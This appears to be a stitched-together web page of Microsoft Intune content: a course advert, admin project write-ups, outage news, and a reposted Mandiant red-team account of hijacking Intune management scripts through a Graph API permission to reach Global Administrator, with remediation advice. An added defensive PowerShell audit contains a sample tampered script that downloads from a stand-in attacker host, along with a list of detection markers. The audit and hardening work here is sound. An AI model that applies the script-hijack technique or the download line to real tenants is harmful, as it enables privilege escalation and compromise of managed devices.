#Microsoft Intune
Celebrate Diwali with Heavy Discount Offer IP4 Networkers
Microsoft Intune course in Madrid, Barcelona and online
MS Intune training for technical consultants and business professionals who want to learn how to manage mobile devices (MDM) in their organization. Intune course offered on-site (in company) or online in Madrid, Barcelona, Valencia, Alicante, Málaga, Seville and Bilbao, on demand for companies.
Learn all the latest developments around MS Intune and prepare for your certification.
What is Microsoft Intune?
Microsoft 365 Intune is a cloud-based service specializing in mobile device management (MDM) and mobile application management (MAM). This Microsoft solution lets us control how devices such as mobile phones, laptops or tablets are used within an organization or company, and lets us set specific policies to control the Office 365 applications. In this way we can prevent email messages from being sent to people outside the organization, and help keep business data protected even on employees' personal devices and applications.
Maintain the productivity of administrators and corporate users across all their devices, activate automated deployments to all Intune-managed devices with just a few clicks, and streamline remote administration and device management when support situations arise. As a Microsoft Intune partner, all the key features are there.
Discover Windows 365 Frontline
Discover Windows 365 Frontline, Microsoft's innovative solution developed specifically for shift and part-time workers. Learn how Cloud PCs are revolutionizing the world of work and enabling flexible, secure and efficient ways of working.
How Microsoft addresses the needs of shift and part-time workers with an innovative solution. Hello dear readers! 👋 Have you heard about the latest innovation from Microsoft? It is Windows 365 Frontline, a groundbreaking solution tailored specifically to the needs of shift and part-time workers. In our increasingly…
O365 Security Overview
Office 365 is a popular cloud-based productivity suite that offers many benefits for businesses of all sizes. These Top 5 Security Settings in O365 should help you get started on your path towards a more secure cloud. However, with great power comes great responsibility. As an O365 administrator, you need to ensure that your organization’s data and users are protected from cyber threats and…

Project lead: locking down Samsung S7 tablets using an Intune Android policy at Engitix
So part of the Cyber Essentials Plus requirements was that we had to lock down the scientists' tablets from downloading unauthorised Google Play apps. The only apps authorised to be on the Samsung S7 tablets were the Microsoft Office suite (Word, Excel, PowerPoint, OneNote, OneDrive, Teams) and Arduino Science Journal.
To do this I first created an Azure AD group called ENG_AND_ALLOW.
I then created an Android configuration profile called ENG_ALLOW_APPS. In it I selected the Office 365 apps and Arduino Science Journal, then created the configuration profile.
Once this was done we decided to try a test tablet and add it to the ENG_AND_ALLOW group. Once we set this, the configuration policy kicked in. We tried to download other Google Play apps but it would not allow us. Downloading only the Office apps and Arduino Science Journal worked fine.
We targeted 5 tablets a day, and if there was an issue we could remove the tablet from the ENG_AND_ALLOW group, which removed the policy.
Learn about Microsoft Security Copilot
Microsoft Security Copilot (Security Copilot) is a generative AI-powered security solution that helps increase the efficiency and capabilities of defenders to improve security outcomes at machine speed and scale, while remaining compliant with responsible AI principles. Introducing Microsoft Security Copilot: learn how Microsoft Security Copilot works. Learn how Security Copilot combines an…

Simplifying Your IT Infrastructure with Microsoft Intune: Our Expertise at Your Service!
Microsoft Intune provides a solution to these critical challenges. This cloud-based management solution is designed to help businesses manage their IT infrastructure remotely. Learn to set up, manage, and monitor your IT infrastructure using Intune. Get started with top-notch Intune consulting.
https://blog.trndigital.com/simplifying-your-it-infrastructure-with-microsoft-intune-our-expertise-at-your-service
How do you add an application in Intune (for Windows)?
In this tutorial we want to learn how we can add an application in Intune (for Windows). To add an app in Microsoft Intune, you can follow these general steps: Sign into the Microsoft Endpoint Manager admin center (https://endpoint.microsoft.com) using your administrator account. Navigate to "Apps" from the left-hand menu. Click on "Add" to start the process of…
Want to use Microsoft Intune to install Tux Paint on a large number of Windows boxes? Tux Paint's installer offers a "/SILENT" option to install without popping up an interactive window!
Microsoft Says 8.5 Million Windows Devices Impacted by CrowdStrike Incident, Publishes Recovery Tool

Source: https://www.securityweek.com/microsoft-says-8-5-million-windows-devices-impacted-by-crowdstrike-incident-publishes-recovery-tool/
More info: https://techcommunity.microsoft.com/t5/intune-customer-success/new-recovery-tool-to-help-with-crowdstrike-issue-impacting/ba-p/4196959
Microsoft Intune Partner
Technology Solutions Worldwide offers unparalleled expertise as a Microsoft Intune Partner, providing businesses with comprehensive mobile device management solutions. Our services ensure seamless integration, enhanced security, and streamlined operations for your organization. With Techsolworld.com, you gain access to tailored strategies that empower your workforce while safeguarding sensitive data. Experience the future of device management with our dedicated support and innovative solutions. For more information or to get started, please call us at 470-208-1024. For More Information: https://www.behance.net/gallery/221777783/Microsoft-Intune-Partner
Entra ID Lateral Movement And Expanding Permission Usage

Abusing Intune Permissions for Lateral Movement and Privilege Escalation in Entra ID Native Environments: (In)tune to Takeovers
Recently, a client engaged the Mandiant Red Team to visualize the potential consequences of an advanced threat actor breach. During the assessment, Mandiant moved laterally from the customer's on-premises environment into their Microsoft Entra ID tenant in order to compromise the tenant's existing Entra ID service principals.
Using a popular security architecture that involves Intune-managed Privileged Access Workstations (PAWs), this blog post discusses a new method by which adversaries can move laterally and elevate privileges within Microsoft Entra ID by abusing Intune permissions (DeviceManagementConfiguration.ReadWrite.All) granted to Entra ID service principals. We also offer recommendations and remediation steps to prevent and detect this kind of attack.
A pretext
The client had a mature security architecture that followed the Enterprise Access model recommended by Microsoft, which included:
An on-premises Active Directory environment that follows the Tiered Model.
An Entra ID environment synchronized with Microsoft Entra Connect Sync, which synchronizes on-premises identities and groups to Entra ID. This environment was administered from PAWs that were fully cloud-native and managed by Intune Mobile Device Management (MDM); they were not joined to the on-premises Active Directory. IT administrators used dedicated cloud-native (non-synced) administrative accounts to access these systems, and these cloud-native administrative accounts were the only ones assigned Entra ID roles (Global Administrator, Privileged Role Administrator, etc.).
Separating administrative accounts, devices and privileges between the Entra ID environment and the on-premises environment created a robust security barrier:
Because Entra ID privileged roles are tied to dedicated cloud-native identities, a compromise of the on-premises Active Directory cannot be used to compromise the Entra ID environment. This is a Microsoft recommended practice.
Using separate physical workstations for administrative access to cloud and on-premises resources effectively creates an "air gap" between the administration planes of the two environments, which attackers find very hard to cross.
Strong Conditional Access policies applied to the administrative accounts in Entra ID, with roles assigned through Privileged Identity Management, required multi-factor authentication and a managed, compliant device. Microsoft also recommends these best practices.
Attack Path
One of the objectives of the assessment was for the Mandiant Red Team to obtain Global Administrator access to the Entra ID tenant. Using a variety of methods that are outside the scope of this blog post, Mandiant obtained the ability to add credentials to Entra ID service principals (microsoft.directory/servicePrincipals/credentials/update). This gave the Red Team the ability to compromise any pre-existing service principal.
There are a number of well-known methods for abusing service principal permissions to obtain higher privileges, most notably through the Microsoft Graph permissions RoleManagement.ReadWrite.Directory, AppRoleAssignment.ReadWrite.All, and Application.ReadWrite.All.
However, none of these permissions were in use in the customer's environment, so the Mandiant Red Team had to reconsider their approach.
After using the excellent ROADtools framework to learn more about the customer's Entra ID environment, Mandiant found a service principal that had been granted the DeviceManagementConfiguration.ReadWrite.All permission.
With this permission the service principal is able to "read and write Microsoft Intune device configuration and policies".
Intune can run custom PowerShell scripts for device management on clients running Windows 10 and later. The ability to run scripts on local devices gives administrators an alternative way to configure settings that are not available through Intune's configuration policies or apps section. Management scripts run with administrator rights (NT AUTHORITY\SYSTEM) when the device starts up.
The DeviceManagementConfiguration.ReadWrite.All permission is required to list, read, create, and update management scripts via the Microsoft Graph API.
The Microsoft Graph API makes it simple to write or edit a management script. An example HTTP request to alter an existing script is shown below:

PATCH https://graph.microsoft.com/beta/deviceManagement/deviceManagementScripts/<script id>
{
  "@odata.type": "#microsoft.graph.deviceManagementScript",
  "displayName": "<display name>",
  "description": "<description>",
  "scriptContent": "<PowerShell script in base64 encoding>",
  "runAsAccount": "system",
  "enforceSignatureCheck": false,
  "fileName": "<filename>",
  "roleScopeTagIds": [ "<existing role scope tags>" ],
  "runAs32Bit": false
}
Using the Graph API, the caller provides a display name, file name and description in addition to the Base64-encoded PowerShell script content. The runAsAccount parameter can be set to either user or system, depending on which principal the script should run as. roleScopeTagIds references Intune's Scope Tags, which associate users and devices; these can likewise be created and managed with the DeviceManagementConfiguration.ReadWrite.All permission.
With the DeviceManagementConfiguration.ReadWrite.All permission, Mandiant was able to move laterally to the PAWs used for Entra ID administration by changing an existing device management script to run a PowerShell script under Mandiant's control. The Intune management script runs the malicious script when the device reboots as part of the user's regular workday.
By implanting a command-and-control agent, Mandiant could issue arbitrary commands to the PAWs. The Red Team obtained privileged access to Entra ID by waiting for the victim to activate their privileged role through Azure Privileged Identity Management and then impersonating the privileged account (for example, by stealing cookies or tokens). With these actions, Mandiant fulfilled the assessment's goal and gained Global Administrator rights in Entra ID.
Remediation and Recommendations
To avoid the attack scenario, Mandiant suggests the following hardening measures:
Review your organization's service principals for the DeviceManagementConfiguration.ReadWrite.All permission: Organizations that use Microsoft Intune for device management should treat DeviceManagementConfiguration.ReadWrite.All as a sensitive permission, since it grants the holder control over Intune-managed devices and, consequently, over any identities connected to those devices.
Mandiant advises businesses to routinely review the permissions granted to Azure service principals, with a focus on DeviceManagementConfiguration.ReadWrite.All along with other sensitive permissions such as RoleManagement.ReadWrite.Directory, AppRoleAssignment.ReadWrite.All, and Application.ReadWrite.All.
Businesses that manage PAWs with Intune should exercise extra caution when assigning Intune privileges, whether via DeviceManagementConfiguration.ReadWrite.All or via Entra roles like Intune Role Administrator.
Enable Intune’s multiple admin approval: Intune allows you to use Access Policies to demand a second administrator’s approval before applying any changes. By doing this, an attacker would be unable to use a single compromised account to create or alter management scripts.
Think about turning on activity logs for the Microsoft Graph API: Graph API Activity logs, which provide comprehensive details about Graph API HTTP requests made to Microsoft Graph resources, can be enabled to aid in detection and response efforts.
Make use of the features that Workload ID Premium licenses offer: With a Workload ID Premium license, Mandiant suggests using these features to:
Limit the use of privileged service principals to known, reliable places only. By guaranteeing that only trustworthy places are used, this reduces the possibility of unwanted access and improves security.
Enable risk detections in Microsoft Identity Protection to improve service principal security. When risk factors or questionable activity are found, this can proactively prohibit access.
Keep an eye on service principal sign-ins proactively: Monitoring service principal sign-ins proactively can aid in identifying irregularities and possible dangers. Incorporate this information into security procedures to set off notifications and facilitate quick action in the event of unwanted access attempts.
Mandiant has a thorough grasp of the various ways attackers may compromise their target's cloud estate, built through adversary emulation engagements, Red Team Assessments and Purple Team Assessments.
Read more on Govindhtech.com
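The audit the remediation section calls for, as an added example (not code from the Mandiant write-up or from Google Cloud): a PowerShell function that resolves each service principal's app role assignments on the Microsoft Graph service principal back to permission names and reports any principal holding one of the permissions named above, plus a function that decodes a deviceManagementScript's Base64 scriptContent and flags download-and-execute cmdlets so a reviewer can see what would run as SYSTEM. The principal names, role ids and script body are constructed sample data (the role ids are placeholders, not the real GUIDs); the commented live-tenant calls use the Microsoft Graph PowerShell SDK and are an assumption about how a reader would wire this to a real tenant.

```powershell
# Added example, not code from the Mandiant post. Sample data below is constructed.
$SensitiveGraphPermissions = @(
    'DeviceManagementConfiguration.ReadWrite.All',
    'RoleManagement.ReadWrite.Directory',
    'AppRoleAssignment.ReadWrite.All',
    'Application.ReadWrite.All'
)

function Find-SensitiveServicePrincipal {
    # $GraphSp:   the Microsoft Graph service principal (.Id, .AppRoles[].Id/.Value)
    # $TenantSps: principals with .DisplayName and .AppRoleAssignments[].ResourceId/.AppRoleId
    # An appRoleId only has meaning for the resource it was granted on, so assignments
    # on any resource other than the Graph SP are ignored rather than mis-resolved.
    param(
        [Parameter(Mandatory)] $GraphSp,
        [Parameter(Mandatory)] [object[]] $TenantSps,
        [string[]] $Sensitive = $SensitiveGraphPermissions
    )
    $roleName = @{}
    foreach ($role in $GraphSp.AppRoles) { $roleName[[string]$role.Id] = $role.Value }

    foreach ($sp in $TenantSps) {
        $held = foreach ($a in $sp.AppRoleAssignments) {
            if ([string]$a.ResourceId -ne [string]$GraphSp.Id) { continue }
            $name = $roleName[[string]$a.AppRoleId]
            if ($name -and $Sensitive -contains $name) { $name }
        }
        if ($held) {
            [pscustomobject]@{ DisplayName = $sp.DisplayName; Permissions = @($held | Sort-Object -Unique) }
        }
    }
}

function ConvertFrom-IntuneScript {
    # $ManagementScript: the object from GET /beta/deviceManagement/deviceManagementScripts/{id}
    # (scriptContent is Base64 of the PowerShell text; runAsAccount is user or system).
    param([Parameter(Mandatory)] $ManagementScript)
    $text = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($ManagementScript.scriptContent))
    # Cmdlets that fetch or evaluate remote content are the usual sign of a hijacked script.
    $markers = 'Invoke-WebRequest', 'Invoke-Expression', 'DownloadString', 'Start-BitsTransfer', 'FromBase64String'
    $suspicious = @($markers | Where-Object { $text -match [regex]::Escape($_) })
    [pscustomobject]@{
        DisplayName  = $ManagementScript.displayName
        RunAsAccount = $ManagementScript.runAsAccount
        Suspicious   = $suspicious
        Content      = $text
    }
}

# --- constructed sample data (placeholder ids, not the real Graph app role GUIDs) ---
$graphSp = [pscustomobject]@{
    Id       = 'graph-sp-0001'
    AppRoles = @(
        [pscustomobject]@{ Id = 'role-dmc-rw';    Value = 'DeviceManagementConfiguration.ReadWrite.All' },
        [pscustomobject]@{ Id = 'role-user-read'; Value = 'User.Read.All' },
        [pscustomobject]@{ Id = 'role-rm-rw';     Value = 'RoleManagement.ReadWrite.Directory' }
    )
}
$tenantSps = @(
    [pscustomobject]@{ DisplayName = 'Intune Automation'; AppRoleAssignments = @(
        [pscustomobject]@{ ResourceId = 'graph-sp-0001';  AppRoleId = 'role-dmc-rw' },
        [pscustomobject]@{ ResourceId = 'graph-sp-0001';  AppRoleId = 'role-user-read' }) },
    [pscustomobject]@{ DisplayName = 'HR Sync'; AppRoleAssignments = @(
        [pscustomobject]@{ ResourceId = 'graph-sp-0001';  AppRoleId = 'role-user-read' }) },
    [pscustomobject]@{ DisplayName = 'Legacy Connector'; AppRoleAssignments = @(
        [pscustomobject]@{ ResourceId = 'graph-sp-0001';  AppRoleId = 'role-rm-rw' },
        [pscustomobject]@{ ResourceId = 'other-resource'; AppRoleId = 'role-dmc-rw' }) }   # not the Intune permission
)
Find-SensitiveServicePrincipal -GraphSp $graphSp -TenantSps $tenantSps | Format-Table -AutoSize

# Constructed sample of a tampered script: a benign first line with a download appended.
$tamperedScript = @{
    displayName   = 'Set timezone'
    runAsAccount  = 'system'
    scriptContent = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes(
        "Set-TimeZone -Id 'GMT Standard Time'`r`nInvoke-WebRequest -Uri http://attacker.invalid/a.ps1 -OutFile `$env:TEMP\a.ps1`r`n"))
}
ConvertFrom-IntuneScript -ManagementScript $tamperedScript | Select-Object DisplayName, RunAsAccount, Suspicious

# Against a live tenant (assumed wiring; needs the Microsoft.Graph module):
#   Connect-MgGraph -Scopes 'Application.Read.All','DeviceManagementConfiguration.Read.All'
#   $graphSp   = Get-MgServicePrincipal -Filter "appId eq '00000003-0000-0000-c000-000000000000'"
#   $tenantSps = Get-MgServicePrincipal -All | ForEach-Object {
#       [pscustomobject]@{ DisplayName = $_.DisplayName
#                          AppRoleAssignments = Get-MgServicePrincipalAppRoleAssignment -ServicePrincipalId $_.Id -All } }
#   $list = (Invoke-MgGraphRequest -Method GET -Uri 'https://graph.microsoft.com/beta/deviceManagement/deviceManagementScripts').value
#   foreach ($s in $list) {   # the list omits scriptContent; fetch each script by id
#       ConvertFrom-IntuneScript (Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/beta/deviceManagement/deviceManagementScripts/$($s.id)") }
```

For the sample data this lists Intune Automation (DeviceManagementConfiguration.ReadWrite.All) and Legacy Connector (RoleManagement.ReadWrite.Directory); HR Sync holds only User.Read.All, and Legacy Connector's role-dmc-rw on another resource is correctly not counted as the Intune permission. The decoded script is flagged for Invoke-WebRequest. In a real review, compare the decoded content of every script against what change control approved, not just against a cmdlet list.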
Update July 30 10:14 EDT: Microsoft has confirmed that this outage affected the Microsoft 365 admin center, Intune, Entra, Power BI and Power Platform services. It also added that SharePoint Online, OneDrive for Business, Microsoft Teams and Exchange Online are not affected. "Users who can access the affected Microsoft 365 services may experience delays or degraded functional performance," Microsoft explained on its service health status page. "To assist the investigation, we are analyzing traffic patterns within the network infrastructure section. In addition, we are considering mitigation options, including a potential failover, to reduce the impact." Update July 30 11:15 EDT: Microsoft says service availability is improving after a network configuration change. "We implemented a network configuration change, and some Microsoft 365 services performed a failover to alternate network paths to mitigate the issue," the company said. "Telemetry monitoring shows service availability improving, and we continue to monitor to ensure full recovery." Update July 30 14:14 EDT: Microsoft announced that the outage was caused by an "unexpected usage spike," which "resulted in Azure Front Door (AFD) and Azure Content Delivery Network (CDN) components performing below acceptable thresholds, leading to intermittent errors, timeouts and latency spikes." "We have updated our mitigations to minimize these side effects and are applying them following safe deployment practices, starting with the Asia Pacific region and expanding gradually," the company added. Update July 30 16:54 EDT: Microsoft said that "the majority of customers and services are fully mitigated" and that its engineers are "in the final stages of validating recovery."
Microsoft 365 and Azure outage takes down multiple services
Deploy Bitlocker using Endpoint Manager for VCCP
So as part of ISO 27001, the business had made a decision that all Windows laptops should be encrypted with BitLocker and all Macs would be encrypted with FileVault. I was brought in as the lead for all Windows laptop devices. We had 630 Windows laptops we had to roll out BitLocker to. All these laptops were already Autopilot enrolled into Endpoint Manager.
The first thing we had to do was check that all Windows 10 operating systems were on the 1809 version, as any versions below this would cause issues. To do this we sent an email to all users to do a Windows update over the weekend; the service desk guys would then check in Endpoint Manager to confirm they were on the latest build. For any users that were not, the service desk guys would chase the user and do the update for them.
Once the checks were completed by the service desk and the laptops were in place. I first created the Endpoint Manager policy and used the endpoint protection policy.
We used the following settings for the policy.
-Set Encrypt Devices
-Allow the users to enable encryption during AAD join.
-Configure encryption method (We went with the default of XTS-AES 256 bit)
-We set the fixed drive recovery and enabled the store recovery information in Azure Active Directory. (This is so that bitlocker keys would auto enroll in Azure Active Directory)
-We blocked the bitlocker removable storage (This is so a 3rd Party cannot take the drive and decrypt it)
Once the policy was created I created an Azure AD Group and called it Win10 Bitlocker and I assigned the Windows 10 Bitlocker Policy to the Azure AD Windows 10 Bitlocker group.
We then decided to select about 10 windows devices from users in separate departments and assigned their devices to the Win10 Bitlocker group. Once this was done I would run a sync to push the policy onto the laptop.
The next day I would check that the policy has applied to the device successfully. Service desk would check to see if the drive has been encrypted to see if there is a lock against the drive. If it has been encrypted they would also check in Azure AD to see that the Bitlocker key is there. If the drive is not encrypted then they would force it from the client side by running a sync.
This process took over 3 months to encrypt all laptops with BitLocker, with the key in Azure AD ready to use if we needed to decrypt the hard drive.
Fallback
In stock we kept a total of 50 HP G8 laptops with Windows 10 that were ready to go if there was an issue with the users laptop and drives and we could swap out the laptop.
Issues faced
TPM on HP Pavilion G6
So one issue faced was that the TPM chips on the HP G6 laptops were too old and would not work with the deployment of BitLocker via Endpoint Manager. We could have just encrypted these drives manually and then stored the BitLocker key in Azure AD, but we decided to swap these laptops out with HP G8 laptops during the process.
Bitlocker drive could not be applied
So we had it on a handful of devices where group policies had been managing the device in the past, which leaves the following registry key on the local machine:
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\FVE
To get around this, the service desk would delete the key and run a sync manually from the client machine, which fixed the issue.
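A per-device check for the roll-out described above, added here as an example and not part of the post or of Microsoft's tooling: it reads the OS volume's BitLocker state and key protectors, reports whether a recovery password protector exists (the protector that gets escrowed to Azure AD / Entra ID), and detects the leftover HKLM\SOFTWARE\Policies\Microsoft\FVE key from the "Issues faced" section. With -Remediate it removes that key, triggers an Intune sync and re-escrows the recovery password. Assumptions: a Windows 10/11 device with the built-in BitLocker module, run elevated; the PushLaunch scheduled task under \Microsoft\Windows\EnterpriseMgmt is my assumed way to kick a sync from the client; the function and parameter names are mine.

```powershell
# Added example, not from the post. Run elevated on the device being checked.
#Requires -RunAsAdministrator

function Test-BitLockerRollout {
    param(
        [string] $MountPoint   = 'C:',
        [string] $FvePolicyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\FVE',
        [switch] $Remediate    # delete the stale GPO key, re-sync, re-escrow the recovery key
    )
    $vol      = Get-BitLockerVolume -MountPoint $MountPoint
    $recovery = @($vol.KeyProtector | Where-Object KeyProtectorType -eq 'RecoveryPassword')
    $tpm      = @($vol.KeyProtector | Where-Object KeyProtectorType -like 'Tpm*')
    $stale    = Test-Path $FvePolicyKey   # GPO-managed BitLocker settings left on the box

    $result = [pscustomobject]@{
        MountPoint         = $MountPoint
        VolumeStatus       = $vol.VolumeStatus       # FullyEncrypted / EncryptionInProgress / FullyDecrypted
        ProtectionStatus   = $vol.ProtectionStatus   # On / Off
        EncryptionMethod   = $vol.EncryptionMethod   # the post's policy expects XtsAes256
        TpmProtector       = $tpm.Count -gt 0
        RecoveryProtectors = $recovery.Count         # 0 means nothing can be escrowed to Entra ID
        StaleGpoKey        = $stale
    }

    if ($Remediate) {
        if ($stale) {
            # The GPO-era settings under this key take precedence over the MDM policy;
            # remove them and let the next Intune sync re-apply the CSP settings.
            Remove-Item -Path $FvePolicyKey -Recurse -Force
            # Assumed sync trigger: the enrollment client's PushLaunch task (path is an assumption).
            Get-ScheduledTask -TaskPath '\Microsoft\Windows\EnterpriseMgmt\*' -TaskName 'PushLaunch' -ErrorAction SilentlyContinue |
                Start-ScheduledTask
        }
        # Re-escrow every recovery password so the key is in Entra ID even if the
        # backup at encryption time failed (the check the post's service desk did by hand).
        foreach ($kp in $recovery) {
            BackupToAAD-BitLockerKeyProtector -MountPoint $MountPoint -KeyProtectorId $kp.KeyProtectorId | Out-Null
        }
    }
    $result
}

Test-BitLockerRollout -MountPoint 'C:' | Format-List
```

Run it without -Remediate first across a pilot group and look for devices where VolumeStatus is FullyDecrypted together with StaleGpoKey true; those are the ones the post's workaround applies to. A device with TpmProtector false after the policy has applied is the HP G6 case above: the TPM is unusable and the policy cannot complete, so the laptop needs manual encryption or replacement rather than another sync.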